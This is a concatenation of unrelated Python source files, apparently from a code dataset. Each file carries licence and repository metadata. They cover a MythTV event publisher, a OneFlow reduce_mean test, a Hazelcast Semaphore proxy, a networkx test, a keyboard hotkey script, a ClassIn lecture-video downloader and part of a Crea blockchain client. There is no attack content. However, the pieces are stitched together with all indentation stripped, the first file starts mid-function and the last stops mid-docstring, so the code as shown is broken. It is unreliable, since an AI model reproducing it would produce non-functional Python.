if len(tokens)>=3 and tokens[0] == 'BACKEND_MESSAGE':
if tokens[1].startswith('SYSTEM_EVENT') and 'SCHEDULER_RAN' in tokens[1]:
self.bus.publish({'id':Event.SCHEDULER_RAN})
elif tokens[1].startswith('COMMFLAG_START'):
self.bus.publish({'id':Event.COMMFLAG_START})
elif tokens[1].startswith('SCHEDULE_CHANGE'):
self.bus.publish({'id':Event.SCHEDULE_CHANGED})
except Exception, e:
log.exception(e)
log.debug('Exiting MythEventPublisher')
def shutdown(self):
self.closed = True
try:
self.eventConn.close()
except:
log.exception('On shutting down MythEventPublisher') | 38.277108 | 144 | 0.627951 | [
"Apache-2.0"
] | C6SUMMER/allinclusive-kodi-pi | .kodi/addons/script.mythbox/resources/src/mythbox/mythtv/publish.py | 3,177 | Python |
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
from collections import OrderedDict
import numpy as np
import oneflow as flow
import tensorflow as tf
import test_global_storage
from test_util import GenArgList
gpus = tf.config.experimental.list_physical_devices("GPU")
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
def compare_with_tensorflow(device_type, input_shape, axis, keepdims):
assert device_type in ["gpu", "cpu"]
flow.clear_default_session()
func_config = flow.FunctionConfig()
func_config.default_data_type(flow.float)
@flow.global_function(type="train", function_config=func_config)
def ReduceMeanJob():
with flow.scope.placement(device_type, "0:0"):
x = flow.get_variable(
"x",
shape=input_shape,
dtype=flow.float,
initializer=flow.random_uniform_initializer(minval=-10, maxval=10),
trainable=True,
)
loss = flow.math.reduce_mean(x, axis=axis, keepdims=keepdims)
# TODO: fix facade and add_loss bug
loss = flow.identity(loss)
flow.optimizer.SGD(
flow.optimizer.PiecewiseConstantScheduler([], [1e-4]), momentum=0
).minimize(loss)
flow.watch(x, test_global_storage.Setter("x"))
flow.watch_diff(x, test_global_storage.Setter("x_diff"))
flow.watch(loss, test_global_storage.Setter("loss"))
flow.watch_diff(loss, test_global_storage.Setter("loss_diff"))
return loss
# OneFlow
check_point = flow.train.CheckPoint()
check_point.init()
of_out = ReduceMeanJob().get()
# TensorFlow
with tf.GradientTape(persistent=True) as tape:
x = tf.Variable(test_global_storage.Get("x"))
tf_out = tf.math.reduce_mean(x, axis=axis, keepdims=keepdims)
loss_diff = test_global_storage.Get("loss_diff")
tf_x_diff = tape.gradient(tf_out, x, loss_diff)
assert np.allclose(of_out.numpy(), tf_out.numpy(), rtol=1e-5, atol=1e-5)
assert np.allclose(
test_global_storage.Get("x_diff"), tf_x_diff.numpy(), rtol=1e-5, atol=1e-5
)
def test_reduce_mean(test_case):
arg_dict = OrderedDict()
arg_dict["device_type"] = ["gpu"]
arg_dict["input_shape"] = [(64, 64, 64)]
arg_dict["axis"] = [None, [1], [0, 2]]
arg_dict["keepdims"] = [True, False]
for arg in GenArgList(arg_dict):
compare_with_tensorflow(*arg)
| 35.776471 | 83 | 0.680368 | [
"Apache-2.0"
] | ashing-zhang/oneflow | oneflow/python/test/ops/test_reduce_mean.py | 3,041 | Python |
from hazelcast.protocol.codec import \
semaphore_acquire_codec, \
semaphore_available_permits_codec, \
semaphore_drain_permits_codec, \
semaphore_init_codec, \
semaphore_reduce_permits_codec, \
semaphore_release_codec, \
semaphore_try_acquire_codec
from hazelcast.proxy.base import PartitionSpecificProxy
from hazelcast.util import check_not_negative, to_millis
class Semaphore(PartitionSpecificProxy):
"""
Semaphore is a backed-up distributed alternative to the Python `asyncio.Semaphore <https://docs.python.org/3/library/asyncio-sync.html>`_
Semaphore is a cluster-wide counting semaphore. Conceptually, it maintains a set of permits. Each acquire() blocks
if necessary until a permit is available, and then takes it. Each release() adds a permit, potentially releasing a
blocking acquirer. However, no actual permit objects are used; the semaphore just keeps a count of the number
available and acts accordingly.
The Hazelcast distributed semaphore implementation guarantees that threads invoking any of the acquire methods are
selected to obtain permits in the order in which their invocation of those methods was processed(first-in-first-out;
FIFO). Note that FIFO ordering necessarily applies to specific internal points of execution within the cluster.
Therefore, it is possible for one member to invoke acquire before another, but reach the ordering point after the
other, and similarly upon return from the method.
This class also provides convenience methods to acquire and release multiple permits at a time. Beware of the
increased risk of indefinite postponement when using the multiple acquire. If a single permit is released to a
semaphore that is currently blocking, a thread waiting for one permit will acquire it before a thread waiting for
multiple permits regardless of the call order.
"""
def init(self, permits):
"""
Try to initialize this Semaphore instance with the given permit count.
:param permits: (int), the given permit count.
:return: (bool), ``true`` if initialization success.
"""
check_not_negative(permits, "Permits cannot be negative!")
return self._encode_invoke(semaphore_init_codec, permits=permits)
def acquire(self, permits=1):
"""
Acquires one or specified amount of permits if available, and returns immediately, reducing the number of
available permits by one or given amount.
If insufficient permits are available then the current thread becomes disabled for thread scheduling purposes
and lies dormant until one of following happens:
* some other thread invokes one of the release methods for this semaphore, the current thread is next to be
assigned permits and the number of available permits satisfies this request,
* this Semaphore instance is destroyed, or
* some other thread interrupts the current thread.
:param permits: (int), the number of permits to acquire (optional).
"""
check_not_negative(permits, "Permits cannot be negative!")
return self._encode_invoke(semaphore_acquire_codec, permits=permits)
def available_permits(self):
"""
Returns the current number of permits currently available in this semaphore.
* This method is typically used for debugging and testing purposes.
:return: (int), the number of available permits in this semaphore.
"""
return self._encode_invoke(semaphore_available_permits_codec)
def drain_permits(self):
"""
Acquires and returns all permits that are immediately available.
:return: (int), the number of permits drained.
"""
return self._encode_invoke(semaphore_drain_permits_codec)
def reduce_permits(self, reduction):
"""
Shrinks the number of available permits by the indicated reduction. This method differs from acquire in that it
does not block waiting for permits to become available.
:param reduction: (int), the number of permits to remove.
"""
check_not_negative(reduction, "Reduction cannot be negative!")
return self._encode_invoke(semaphore_reduce_permits_codec, reduction=reduction)
def release(self, permits=1):
"""
Releases one or given number of permits, increasing the number of available permits by one or that amount.
There is no requirement that a thread that releases a permit must have acquired that permit by calling one of
the acquire methods. Correct usage of a semaphore is established by programming convention in the application.
:param permits: (int), the number of permits to release (optional).
"""
check_not_negative(permits, "Permits cannot be negative!")
return self._encode_invoke(semaphore_release_codec, permits=permits)
def try_acquire(self, permits=1, timeout=0):
"""
Tries to acquire one or the given number of permits, if they are available, and returns immediately, with the
value ``true``, reducing the number of available permits by the given amount.
If there are insufficient permits and a timeout is provided, the current thread becomes disabled for thread
scheduling purposes and lies dormant until one of following happens:
* some other thread invokes the release() method for this semaphore and the current thread is next to be
assigned a permit, or
* some other thread interrupts the current thread, or
* the specified waiting time elapses.
If there are insufficient permits and no timeout is provided, this method will return immediately with the value
``false`` and the number of available permits is unchanged.
:param permits: (int), the number of permits to acquire (optional).
:param timeout: (long), the maximum time in seconds to wait for the permit(s) (optional).
:return: (bool), ``true`` if desired amount of permits was acquired, ``false`` otherwise.
"""
check_not_negative(permits, "Permits cannot be negative!")
return self._encode_invoke(semaphore_try_acquire_codec, permits=permits, timeout=to_millis(timeout))
| 52.495868 | 141 | 0.720875 | [
"Apache-2.0"
] | Kilo59/hazelcast-python-client | hazelcast/proxy/semaphore.py | 6,352 | Python |
from nose.tools import *
import networkx as nx
import networkx.algorithms.approximation as a
def test_min_maximal_matching():
# smoke test
G = nx.Graph()
assert_equal(len(a.min_maximal_matching(G)),0)
| 24.666667 | 51 | 0.720721 | [
"MIT"
] | kushgrover/apt-vs-dift | src/prism-fruit/Games-DQL/examples/games/car/networkx/algorithms/approximation/tests/test_matching.py | 222 | Python |
import keyboard
import settings
from key_sender import *
import utils
class HotKey(object):
def __init__(self):
pass
def regist_hotkey(self, hotkey_group, queue_h):
if settings.test:
keyboard.add_hotkey('F10', self.f10_fun)
keyboard.add_hotkey('F11', self.f11_fun)
keyboard.add_hotkey('F12', self.f12_fun)
elif hotkey_group == settings.KeyGroupEnum.modau:
keyboard.add_hotkey('F10', self.modau_f10_fun)
keyboard.add_hotkey('F11', self.modau_f11_fun)
keyboard.add_hotkey('F12', self.modau_f12_fun)
keyboard.wait('esc')
queue_h.put('end')
@staticmethod
def send_key(key):
# time.sleep(0.1)
key_press(key)
def f10_fun(self):
# self.get_foreground_title()
self.send_key(Key['down_arrow'])
self.send_key(Key['up_arrow'])
self.send_key(Key['spacebar'])
def f11_fun(self):
self.send_key(Key['up_arrow'])
self.send_key(Key['up_arrow'])
self.send_key(Key['spacebar'])
def f12_fun(self):
print(utils.get_foreground_title())
# self.send_key(Key['up_arrow'])
# self.send_key(Key['right_arrow'])
# self.send_key(Key['spacebar'])
# 魔道
def modau_f10_fun(self):
self.send_key(Key['down_arrow'])
self.send_key(Key['up_arrow'])
self.send_key(Key['spacebar'])
def modau_f11_fun(self):
self.send_key(Key['up_arrow'])
self.send_key(Key['up_arrow'])
self.send_key(Key['spacebar'])
def modau_f12_fun(self):
self.send_key(Key['up_arrow'])
self.send_key(Key['right_arrow'])
self.send_key(Key['spacebar'])
| 28.245902 | 58 | 0.614045 | [
"Apache-2.0"
] | Llona/hotkey | send_key_explame/pypiwin32/hot_key.py | 1,727 | Python |
import os
import re
import sys
import json
import time
import requests
import downloader
from config import TEMP_FOLDER
# 爬虫请求头
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.9,zh-TW;q=0.8,en;q=0.7',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',
}
class Blackboard():
def __init__(self, html):
self.html = html
def links(self):
classin_re = re.compile(r'https\:\/\/www\.eeo\.cn\/live\.php\?lessonKey\=[0-9a-zA-Z]+')
links = classin_re.findall(self.html)
return links
def lessonkeys(self):
classin_re = re.compile(r'(?<=https:\/\/www\.eeo\.cn\/live\.php\?lessonKey\=)[0-9a-zA-Z]+')
keys = classin_re.findall(self.html)
return keys
class Classin():
def __init__(self, lessonkey):
self.lessonkey = lessonkey
self.webcastdata = None
self.classinfo = None
def _webcastdata(self):
if self.webcastdata:
return self.webcastdata
from_data = {
'lessonKey': self.lessonkey
}
r = requests.post('https://www.eeo.cn/saasajax/webcast.ajax.php?action=getLessonWebcastData', data=from_data)
self.webcastdata = json.loads(r.text)
return self.webcastdata
def _classinfo(self):
if self.classinfo:
return self.classinfo
from_data = {
'lessonKey': self.lessonkey
}
r = requests.post('https://www.eeo.cn/saasajax/webcast.ajax.php?action=getLessonClassInfo', data=from_data)
self.classinfo = json.loads(r.text)
return self.classinfo
def course_name(self):
data = self._classinfo()
return data['data']['courseName']
def teacher(self):
data = self._classinfo()
return data['data']['teacherName']
def school(self):
data = self._classinfo()
return data['data']['schoolName']
def start_timestamp(self):
# 秒时间戳
data = self._classinfo()
return data['data']['lessonStarttime']
def end_timestamp(self):
# 秒时间戳
data = self._classinfo()
return data['data']['lessonEndtime']
def videolist(self):
data = self._webcastdata()
vlist = data['data']['lessonData']['vodList']
result = []
for i in sorted(vlist):
result.append(vlist[i])
return result
def _md(self, timestamp):
local_time = time.localtime(int(timestamp))
md = time.strftime("%m%d", local_time)
return md
def md(self):
return self._md(self.start_timestamp())
def info(self):
obj = {
'course_name': self.course_name(),
'teacher': self.teacher(),
'videolist': self.videolist(),
'start_timestamp': self.start_timestamp(),
'end_timestamp': self.end_timestamp(),
'md': self.md()
}
return obj
def get_classin_video(lessonkey):
c = Classin(lessonkey)
path = os.path.join(c.course_name(), c.teacher(), c.md())
if not os.path.exists(path):
os.makedirs(path)
vlist = c.videolist()
for i, v in enumerate(vlist):
# r = requests.get(v, stream=True)
vfile = os.path.join(path, '{}.mp4'.format(i))
print('正在下载:', c.md())
try:
downloader.multithread_download(v, vfile)
except Exception as e:
print(vfile, '下载失败\n链接: ', v, '\n错误: ', e)
# f = open(vfile, "wb")
# try:
# for chunk in r.iter_content(chunk_size=512):
# if chunk:
# f.write(chunk)
# except Exception as e:
# print(vfile, '下载失败\n链接: ', v, '\n错误: ', e)
def get_bb_videos(html_path):
with open(html_path, 'r', encoding='utf-8') as f:
bb_html = f.read()
b = Blackboard(bb_html)
lessonkeys = b.lessonkeys()
for key in lessonkeys:
get_classin_video(key)
def download_all_videos_from_bb_txt():
temp_file_path = 'temp.txt'
open(temp_file_path, 'w', encoding='utf-8').close() # 创建一个空白的临时文本文件
input('即将打开文本编辑器. 按回车键继续...')
os.startfile(temp_file_path)
input('请将「ClassIn 在线研讨室 - 全部显示」页面的源代码复制粘贴到其中, 保存退出后按回车键开始下载...')
if not os.path.exists(TEMP_FOLDER):
os.mkdir(TEMP_FOLDER)
get_bb_videos(temp_file_path)
os.remove(temp_file_path)
if __name__ == "__main__":
download_all_videos_from_bb_txt()
| 29.746753 | 134 | 0.59201 | [
"MIT"
] | JiangGua/classin-downloader | src/bbparser.py | 4,781 | Python |
# This Python file uses the following encoding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from builtins import str
from builtins import object
import json
import logging
import re
import os
import math
import ast
import time
from creagraphenebase.py23 import bytes_types, integer_types, string_types, text_type
from datetime import datetime, timedelta, date
from creaapi.creanoderpc import CreaNodeRPC
from creaapi.exceptions import NoAccessApi, NoApiWithName
from creagraphenebase.account import PrivateKey, PublicKey
from creabase import transactions, operations
from creagraphenebase.chains import known_chains
from .account import Account
from .amount import Amount
from .price import Price
from .storage import configStorage as config
from .version import version as crea_version
from .exceptions import (
AccountExistsException,
AccountDoesNotExistsException
)
from .wallet import Wallet
from .creaconnect import CreaConnect
from .transactionbuilder import TransactionBuilder
from .utils import formatTime, resolve_authorperm, derive_permlink, remove_from_dict, addTzInfo, formatToTimeStamp
from crea.constants import CREA_VOTE_REGENERATION_SECONDS, CREA_100_PERCENT, CREA_1_PERCENT, CREA_RC_REGEN_TIME
log = logging.getLogger(__name__)
class Crea(object):
""" Connect to the Crea network.
:param str node: Node to connect to *(optional)*
:param str rpcuser: RPC user *(optional)*
:param str rpcpassword: RPC password *(optional)*
:param bool nobroadcast: Do **not** broadcast a transaction!
*(optional)*
:param bool unsigned: Do **not** sign a transaction! *(optional)*
:param bool debug: Enable Debugging *(optional)*
:param keys: Predefine the wif keys to shortcut the
wallet database *(optional)*
:type keys: array, dict, string
:param wif: Predefine the wif keys to shortcut the
wallet database *(optional)*
:type wif: array, dict, string
:param bool offline: Boolean to prevent connecting to network (defaults
to ``False``) *(optional)*
:param int expiration: Delay in seconds until transactions are supposed
to expire *(optional)* (default is 30)
:param str blocking: Wait for broadcasted transactions to be included
in a block and return full transaction (can be "head" or
"irreversible")
:param bool bundle: Do not broadcast transactions right away, but allow
to bundle operations. It is not possible to send out more than one
vote operation and more than one comment operation in a single broadcast *(optional)*
:param bool appbase: Use the new appbase rpc protocol on nodes with version
0.19.4 or higher. The settings has no effect on nodes with version of 0.19.3 or lower.
:param int num_retries: Set the maximum number of reconnects to the nodes before
NumRetriesReached is raised. Disabled for -1. (default is -1)
:param int num_retries_call: Repeat num_retries_call times a rpc call on node error (default is 5)
:param int timeout: Timeout setting for https nodes (default is 60)
:param bool use_sc2: When True, a creaconnect object is created. Can be used for
broadcast posting op or creating hot_links (default is False)
:param CreaConnect creaconnect: A CreaConnect object can be set manually, set use_sc2 to True
:param dict custom_chains: custom chain which should be added to the known chains
Three wallet operation modes are possible:
* **Wallet Database**: Here, the crealibs load the keys from the
locally stored wallet SQLite database (see ``storage.py``).
To use this mode, simply call ``Crea()`` without the
``keys`` parameter
* **Providing Keys**: Here, you can provide the keys for
your accounts manually. All you need to do is add the wif
keys for the accounts you want to use as a simple array
using the ``keys`` parameter to ``Crea()``.
* **Force keys**: This more is for advanced users and
requires that you know what you are doing. Here, the
``keys`` parameter is a dictionary that overwrite the
``active``, ``owner``, ``posting`` or ``memo`` keys for
any account. This mode is only used for *foreign*
signatures!
If no node is provided, it will connect to default nodes of
http://geo.crea.pl. Default settings can be changed with:
.. code-block:: python
crea = Crea(<host>)
where ``<host>`` starts with ``https://``, ``ws://`` or ``wss://``.
The purpose of this class it to simplify interaction with
Crea.
The idea is to have a class that allows to do this:
.. code-block:: python
>>> from crea import Crea
>>> crea = Crea()
>>> print(crea.get_blockchain_version()) # doctest: +SKIP
This class also deals with edits, votes and reading content.
Example for adding a custom chain:
.. code-block:: python
from crea import Crea
stm = Crea(node=["https://mytstnet.com"], custom_chains={"MYTESTNET":
{'chain_assets': [{'asset': 'CBD', 'id': 0, 'precision': 3, 'symbol': 'CBD'},
{'asset': 'CREA', 'id': 1, 'precision': 3, 'symbol': 'CREA'},
{'asset': 'VESTS', 'id': 2, 'precision': 6, 'symbol': 'VESTS'}],
'chain_id': '79276aea5d4877d9a25892eaa01b0adf019d3e5cb12a97478df3298ccdd01674',
'min_version': '0.0.0',
'prefix': 'MTN'}
}
)
"""
def __init__(self,
node="",
rpcuser=None,
rpcpassword=None,
debug=False,
data_refresh_time_seconds=900,
**kwargs):
"""Init crea
:param str node: Node to connect to *(optional)*
:param str rpcuser: RPC user *(optional)*
:param str rpcpassword: RPC password *(optional)*
:param bool nobroadcast: Do **not** broadcast a transaction!
*(optional)*
:param bool unsigned: Do **not** sign a transaction! *(optional)*
:param bool debug: Enable Debugging *(optional)*
:param array,dict,string keys: Predefine the wif keys to shortcut the
wallet database *(optional)*
:param array,dict,string wif: Predefine the wif keys to shortcut the
wallet database *(optional)*
:param bool offline: Boolean to prevent connecting to network (defaults
to ``False``) *(optional)*
:param int expiration: Delay in seconds until transactions are supposed
to expire *(optional)* (default is 30)
:param str blocking: Wait for broadcast transactions to be included
in a block and return full transaction (can be "head" or
"irreversible")
:param bool bundle: Do not broadcast transactions right away, but allow
to bundle operations *(optional)*
:param bool use_condenser: Use the old condenser_api rpc protocol on nodes with version
0.19.4 or higher. The settings has no effect on nodes with version of 0.19.3 or lower.
:param int num_retries: Set the maximum number of reconnects to the nodes before
NumRetriesReached is raised. Disabled for -1. (default is -1)
:param int num_retries_call: Repeat num_retries_call times a rpc call on node error (default is 5)
:param int timeout: Timeout setting for https nodes (default is 60)
:param bool use_sc2: When True, a creaconnect object is created. Can be used for broadcast
posting op or creating hot_links (default is False)
:param CreaConnect creaconnect: A CreaConnect object can be set manually, set use_sc2 to True
"""
self.rpc = None
self.debug = debug
self.offline = bool(kwargs.get("offline", False))
self.nobroadcast = bool(kwargs.get("nobroadcast", False))
self.unsigned = bool(kwargs.get("unsigned", False))
self.expiration = int(kwargs.get("expiration", 30))
self.bundle = bool(kwargs.get("bundle", False))
self.creaconnect = kwargs.get("creaconnect", None)
self.use_sc2 = bool(kwargs.get("use_sc2", False))
self.blocking = kwargs.get("blocking", False)
self.custom_chains = kwargs.get("custom_chains", {})
# Store config for access through other Classes
self.config = config
if not self.offline:
self.connect(node=node,
rpcuser=rpcuser,
rpcpassword=rpcpassword,
**kwargs)
self.data = {'last_refresh': None, 'last_node': None, 'dynamic_global_properties': None, 'feed_history': None,
'get_feed_history': None, 'hardfork_properties': None,
'network': None, 'witness_schedule': None,
'config': None, 'reward_funds': None}
self.data_refresh_time_seconds = data_refresh_time_seconds
# self.refresh_data()
# txbuffers/propbuffer are initialized and cleared
self.clear()
self.wallet = Wallet(crea_instance=self, **kwargs)
# set creaconnect
if self.creaconnect is not None and not isinstance(self.creaconnect, CreaConnect):
raise ValueError("creaconnect musst be CreaConnect object")
if self.creaconnect is None and self.use_sc2:
self.creaconnect = CreaConnect(crea_instance=self, **kwargs)
elif self.creaconnect is not None and not self.use_sc2:
self.use_sc2 = True
# -------------------------------------------------------------------------
# Basic Calls
# -------------------------------------------------------------------------
def connect(self,
node="",
rpcuser="",
rpcpassword="",
**kwargs):
""" Connect to Crea network (internal use only)
"""
if not node:
node = self.get_default_nodes()
if not bool(node):
raise ValueError("A Crea node needs to be provided!")
if not rpcuser and "rpcuser" in config:
rpcuser = config["rpcuser"]
if not rpcpassword and "rpcpassword" in config:
rpcpassword = config["rpcpassword"]
self.rpc = CreaNodeRPC(node, rpcuser, rpcpassword, **kwargs)
def is_connected(self):
"""Returns if rpc is connected"""
return self.rpc is not None
def __repr__(self):
if self.offline:
return "<%s offline=True>" % (
self.__class__.__name__)
elif self.rpc is not None and len(self.rpc.url) > 0:
return "<%s node=%s, nobroadcast=%s>" % (
self.__class__.__name__, str(self.rpc.url), str(self.nobroadcast))
else:
return "<%s, nobroadcast=%s>" % (
self.__class__.__name__, str(self.nobroadcast))
def refresh_data(self, force_refresh=False, data_refresh_time_seconds=None):
""" Read and stores crea blockchain parameters
If the last data refresh is older than data_refresh_time_seconds, data will be refreshed
:param bool force_refresh: if True, a refresh of the data is enforced
:param float data_refresh_time_seconds: set a new minimal refresh time in seconds
"""
if self.offline:
return
if data_refresh_time_seconds is not None:
self.data_refresh_time_seconds = data_refresh_time_seconds
if self.data['last_refresh'] is not None and not force_refresh and self.data["last_node"] == self.rpc.url:
if (datetime.utcnow() - self.data['last_refresh']).total_seconds() < self.data_refresh_time_seconds:
return
self.data['last_refresh'] = datetime.utcnow()
self.data["last_node"] = self.rpc.url
self.data["dynamic_global_properties"] = self.get_dynamic_global_properties(False)
try:
self.data['feed_history'] = self.get_feed_history(False)
self.data['get_feed_history'] = self.get_feed_history(False)
except:
self.data['feed_history'] = None
self.data['get_feed_history'] = None
try:
self.data['hardfork_properties'] = self.get_hardfork_properties(False)
except:
self.data['hardfork_properties'] = None
self.data['network'] = self.get_network(False)
self.data['witness_schedule'] = self.get_witness_schedule(False)
self.data['config'] = self.get_config(False)
self.data['reward_funds'] = self.get_reward_funds(False)
def get_dynamic_global_properties(self, use_stored_data=True):
""" This call returns the *dynamic global properties*
:param bool use_stored_data: if True, stored data will be returned. If stored data are
empty or old, refresh_data() is used.
"""
if use_stored_data:
self.refresh_data()
return self.data['dynamic_global_properties']
if self.rpc is None:
return None
self.rpc.set_next_node_on_empty_reply(True)
return self.rpc.get_dynamic_global_properties(api="database")
def get_reserve_ratio(self):
""" This call returns the *reserve ratio*
"""
if self.rpc is None:
return None
self.rpc.set_next_node_on_empty_reply(True)
if self.rpc.get_use_appbase():
return self.rpc.get_reserve_ratio(api="witness")
else:
props = self.get_dynamic_global_properties()
# conf = self.get_config()
reserve_ratio = {'id': 0, 'average_block_size': props['average_block_size'],
'current_reserve_ratio': props['current_reserve_ratio'],
'max_virtual_bandwidth': props['max_virtual_bandwidth']}
return reserve_ratio
def get_feed_history(self, use_stored_data=True):
""" Returns the feed_history
:param bool use_stored_data: if True, stored data will be returned. If stored data are
empty or old, refresh_data() is used.
"""
if use_stored_data:
self.refresh_data()
return self.data['feed_history']
if self.rpc is None:
return None
self.rpc.set_next_node_on_empty_reply(True)
return self.rpc.get_feed_history(api="database")
def get_reward_funds(self, use_stored_data=True):
""" Get details for a reward fund.
:param bool use_stored_data: if True, stored data will be returned. If stored data are
empty or old, refresh_data() is used.
"""
if use_stored_data:
self.refresh_data()
return self.data['reward_funds']
if self.rpc is None:
return None
ret = None
self.rpc.set_next_node_on_empty_reply(True)
if self.rpc.get_use_appbase():
funds = self.rpc.get_reward_funds(api="database")
if funds is not None:
funds = funds['funds']
else:
return None
if len(funds) > 0:
funds = funds[0]
ret = funds
else:
ret = self.rpc.get_reward_fund("post", api="database")
return ret
def get_current_median_history(self, use_stored_data=True):
""" Returns the current median price
:param bool use_stored_data: if True, stored data will be returned. If stored data are
empty or old, refresh_data() is used.
"""
if use_stored_data:
self.refresh_data()
if self.data['get_feed_history']:
return self.data['get_feed_history']['current_median_history']
else:
return None
if self.rpc is None:
return None
ret = None
self.rpc.set_next_node_on_empty_reply(True)
if self.rpc.get_use_appbase():
ret = self.rpc.get_feed_history(api="database")['current_median_history']
else:
ret = self.rpc.get_current_median_history_price(api="database")
return ret
def get_hardfork_properties(self, use_stored_data=True):
""" Returns Hardfork and live_time of the hardfork
:param bool use_stored_data: if True, stored data will be returned. If stored data are
empty or old, refresh_data() is used.
"""
if use_stored_data:
self.refresh_data()
return self.data['hardfork_properties']
if self.rpc is None:
return None
ret = None
self.rpc.set_next_node_on_empty_reply(True)
if self.rpc.get_use_appbase():
ret = self.rpc.get_hardfork_properties(api="database")
else:
ret = self.rpc.get_next_scheduled_hardfork(api="database")
return ret
def get_network(self, use_stored_data=True):
""" Identify the network
:param bool use_stored_data: if True, stored data will be returned. If stored data are
empty or old, refresh_data() is used.
:returns: Network parameters
:rtype: dictionary
"""
if use_stored_data:
self.refresh_data()
return self.data['network']
if self.rpc is None:
return None
try:
return self.rpc.get_network()
except:
return known_chains["CREA"]
def get_median_price(self, use_stored_data=True):
""" Returns the current median history price as Price
"""
median_price = self.get_current_median_history(use_stored_data=use_stored_data)
if median_price is None:
return None
a = Price(
None,
base=Amount(median_price['base'], crea_instance=self),
quote=Amount(median_price['quote'], crea_instance=self),
crea_instance=self
)
return a.as_base(self.sbd_symbol)
def get_block_interval(self, use_stored_data=True):
"""Returns the block interval in seconds"""
props = self.get_config(use_stored_data=use_stored_data)
block_interval = 3
if props is None:
return block_interval
for key in props:
if key[-14:] == "BLOCK_INTERVAL":
block_interval = props[key]
return block_interval
def get_blockchain_version(self, use_stored_data=True):
"""Returns the blockchain version"""
props = self.get_config(use_stored_data=use_stored_data)
blockchain_version = '0.0.0'
if props is None:
return blockchain_version
for key in props:
if key[-18:] == "BLOCKCHAIN_VERSION":
blockchain_version = props[key]
return blockchain_version
def get_dust_threshold(self, use_stored_data=True):
"""Returns the vote dust threshold"""
props = self.get_config(use_stored_data=use_stored_data)
dust_threshold = 0
if props is None:
return dust_threshold
for key in props:
if key[-20:] == "VOTE_DUST_THRESHOLD":
dust_threshold = props[key]
return dust_threshold
def get_resource_params(self):
"""Returns the resource parameter"""
return self.rpc.get_resource_params(api="rc")["resource_params"]
def get_resource_pool(self):
"""Returns the resource pool"""
return self.rpc.get_resource_pool(api="rc")["resource_pool"]
def get_rc_cost(self, resource_count):
"""Returns the RC costs based on the resource_count"""
pools = self.get_resource_pool()
params = self.get_resource_params()
config = self.get_config()
dyn_param = self.get_dynamic_global_properties()
rc_regen = int(Amount(dyn_param["total_vesting_shares"], crea_instance=self)) / (CREA_RC_REGEN_TIME / config["CREA_BLOCK_INTERVAL"])
total_cost = 0
if rc_regen == 0:
return total_cost
for resource_type in resource_count:
curve_params = params[resource_type]["price_curve_params"]
current_pool = int(pools[resource_type]["pool"])
count = resource_count[resource_type]
count *= params[resource_type]["resource_dynamics_params"]["resource_unit"]
cost = self._compute_rc_cost(curve_params, current_pool, count, rc_regen)
total_cost += cost
return total_cost
def _compute_rc_cost(self, curve_params, current_pool, resource_count, rc_regen):
"""Helper function for computing the RC costs"""
num = int(rc_regen)
num *= int(curve_params['coeff_a'])
num = int(num) >> int(curve_params['shift'])
num += 1
num *= int(resource_count)
denom = int(curve_params['coeff_b'])
if int(current_pool) > 0:
denom += int(current_pool)
num_denom = num / denom
return int(num_denom) + 1
def rshares_to_sbd(self, rshares, not_broadcasted_vote=False, use_stored_data=True):
""" Calculates the current CBD value of a vote
"""
payout = float(rshares) * self.get_sbd_per_rshares(use_stored_data=use_stored_data,
not_broadcasted_vote_rshares=rshares if not_broadcasted_vote else 0)
return payout
def get_sbd_per_rshares(self, not_broadcasted_vote_rshares=0, use_stored_data=True):
""" Returns the current rshares to CBD ratio
"""
reward_fund = self.get_reward_funds(use_stored_data=use_stored_data)
reward_balance = Amount(reward_fund["reward_balance"], crea_instance=self).amount
recent_claims = float(reward_fund["recent_claims"]) + not_broadcasted_vote_rshares
fund_per_share = reward_balance / (recent_claims)
median_price = self.get_median_price(use_stored_data=use_stored_data)
if median_price is None:
return 0
CBD_price = (median_price * Amount(1, self.crea_symbol, crea_instance=self)).amount
return fund_per_share * CBD_price
def get_crea_per_mvest(self, time_stamp=None, use_stored_data=True):
""" Returns the MVEST to CREA ratio
:param int time_stamp: (optional) if set, return an estimated
CREA per MVEST ratio for the given time stamp. If unset the
current ratio is returned (default). (can also be a datetime object)
"""
if time_stamp is not None:
if isinstance(time_stamp, (datetime, date)):
time_stamp = formatToTimeStamp(time_stamp)
a = 2.1325476281078992e-05
b = -31099.685481490847
a2 = 2.9019227739473682e-07
b2 = 48.41432402074669
if (time_stamp < (b2 - b) / (a - a2)):
return a * time_stamp + b
else:
return a2 * time_stamp + b2
global_properties = self.get_dynamic_global_properties(use_stored_data=use_stored_data)
return (
Amount(global_properties['total_vesting_fund_crea'], crea_instance=self).amount /
(Amount(global_properties['total_vesting_shares'], crea_instance=self).amount / 1e6)
)
def vests_to_sp(self, vests, timestamp=None, use_stored_data=True):
""" Converts vests to SP
:param amount.Amount vests/float vests: Vests to convert
:param int timestamp: (Optional) Can be used to calculate
the conversion rate from the past
"""
if isinstance(vests, Amount):
vests = vests.amount
return vests / 1e6 * self.get_crea_per_mvest(timestamp, use_stored_data=use_stored_data)
def sp_to_vests(self, sp, timestamp=None, use_stored_data=True):
""" Converts SP to vests
:param float sp: Crea power to convert
:param datetime timestamp: (Optional) Can be used to calculate
the conversion rate from the past
"""
return sp * 1e6 / self.get_crea_per_mvest(timestamp, use_stored_data=use_stored_data)
def sp_to_sbd(self, sp, voting_power=CREA_100_PERCENT, vote_pct=CREA_100_PERCENT, not_broadcasted_vote=True, use_stored_data=True):
""" Obtain the resulting CBD vote value from Crea power
:param number crea_power: Crea Power
:param int voting_power: voting power (100% = 10000)
:param int vote_pct: voting percentage (100% = 10000)
:param bool not_broadcasted_vote: not_broadcasted or already broadcasted vote (True = not_broadcasted vote).
Only impactful for very big votes. Slight modification to the value calculation, as the not_broadcasted
